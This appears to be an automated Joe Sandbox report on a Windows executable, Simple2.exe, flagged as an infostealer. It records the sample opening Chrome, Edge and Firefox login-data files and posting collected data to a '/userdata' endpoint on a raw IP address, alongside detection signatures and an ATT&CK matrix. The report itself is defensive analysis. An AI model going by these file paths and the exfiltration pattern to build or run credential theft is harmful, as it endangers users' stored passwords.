Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Simple2.exe

Overview

General Information

Sample name:Simple2.exe
Analysis ID:1569894
MD5:ed207427a25863f5524d616525943dd5
SHA1:6b7aa5224f76b8e09d3a8eefdb299e16b37c887f
SHA256:418b88c4cd03e7da38287324094b5af3843835d63e06fd44c0fb06903d7575b6
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)

Classification

  • System is w10x64
  • Simple2.exe (PID: 1520 cmdline: "C:\Users\user\Desktop\Simple2.exe" MD5: ED207427A25863F5524D616525943DD5)
    • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Simple2.exeAvira: detected
Source: Simple2.exeReversingLabs: Detection: 54%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
Source: Simple2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: eA:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple2.exe
Source: Binary string: A:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple2.exe
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA3A40 memset,NetUserEnum,NetApiBufferFree,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,0_2_00007FF6D5CA3A40
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 97256Host: 185.237.165.97
Source: Simple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: Simple2.exe, 00000000.00000003.2094063431.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360334802.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02EE000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: Simple2.exe, 00000000.00000003.2094063431.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360334802.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatae0
Source: Simple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatarell
Source: Simple2.exe, 00000000.00000002.2360234153.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094362886.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdata
Source: Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2059854753.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2060490791.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/_
Source: Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/i
Source: Simple2.exe, 00000000.00000003.2059854753.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA1AC00_2_00007FF6D5CA1AC0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA4CB00_2_00007FF6D5CA4CB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA41F00_2_00007FF6D5CA41F0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA55400_2_00007FF6D5CA5540
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA45700_2_00007FF6D5CA4570
Source: classification engineClassification label: mal68.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA37A0 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6D5CA37A0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: Simple2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Simple2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Simple2.exe, 00000000.00000003.2061160015.0000022EA0319000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2061085119.0000022EA0325000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2062262842.0000022EA0324000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2063189521.0000022EA0356000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2062262842.0000022EA034C000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2062176168.0000022EA0330000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2062176168.0000022EA033B000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2063189521.0000022EA0317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Simple2.exeReversingLabs: Detection: 54%
Source: unknownProcess created: C:\Users\user\Desktop\Simple2.exe "C:\Users\user\Desktop\Simple2.exe"
Source: C:\Users\user\Desktop\Simple2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Simple2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Simple2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Simple2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: eA:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple2.exe
Source: Binary string: A:\VS Projects\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple2.exe
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Simple2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Simple2.exeCode function: GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6D5CA5540
Source: C:\Users\user\Desktop\Simple2.exe TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Simple2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA5540 GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6D5CA5540
Source: Simple2.exe, 00000000.00000003.2094063431.0000022EA0306000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2059936677.0000022EA0306000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360334802.0000022EA0306000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA0306000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2060423034.0000022EA0306000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2059797050.0000022EA0306000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Simple2.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CABB0C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6D5CABB0C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CABB0C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6D5CABB0C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CABCB0 SetUnhandledExceptionFilter,0_2_00007FF6D5CABCB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CAB780 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6D5CAB780
Source: C:\Users\user\Desktop\Simple2.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6D5CA3E70
Source: C:\Users\user\Desktop\Simple2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CABD1C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6D5CABD1C
Source: C:\Users\user\Desktop\Simple2.exeCode function: 0_2_00007FF6D5CA5540 GetConsoleWindow,ShowWindow,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GlobalMemoryStatusEx,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,NetGetJoinInformation,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,memset,GetModuleFileNameA,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,0_2_00007FF6D5CA5540

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\Simple2.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF6D5CA4CB0
Source: C:\Users\user\Desktop\Simple2.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF6D5CA4CB0
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Simple2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Simple2.exe54%ReversingLabsWin64.Trojan.Generic
Simple2.exe100%AviraTR/AVI.Agent.pvpsx
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97:80/userdata0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/userdatarell0%Avira URL Cloudsafe
http://185.237.165.97/userdatae00%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.12.205
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://api.ipify.org/Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2059854753.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2060490791.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://api.ipify.org/_Simple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://185.237.165.97/userdatarellSimple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://185.237.165.97/userdatae0Simple2.exe, 00000000.00000003.2094063431.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360334802.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094263293.0000022EA02F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://185.237.165.97:80/userdataSimple2.exe, 00000000.00000002.2360234153.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000003.2094362886.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://api.ipify.org/iSimple2.exe, 00000000.00000002.2360080555.0000022EA02A6000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://api.ipify.org:80/Simple2.exe, 00000000.00000003.2059854753.0000022EA02C8000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://185.237.165.97/Simple2.exe, 00000000.00000003.2094362886.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmp, Simple2.exe, 00000000.00000002.2360234153.0000022EA02D5000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
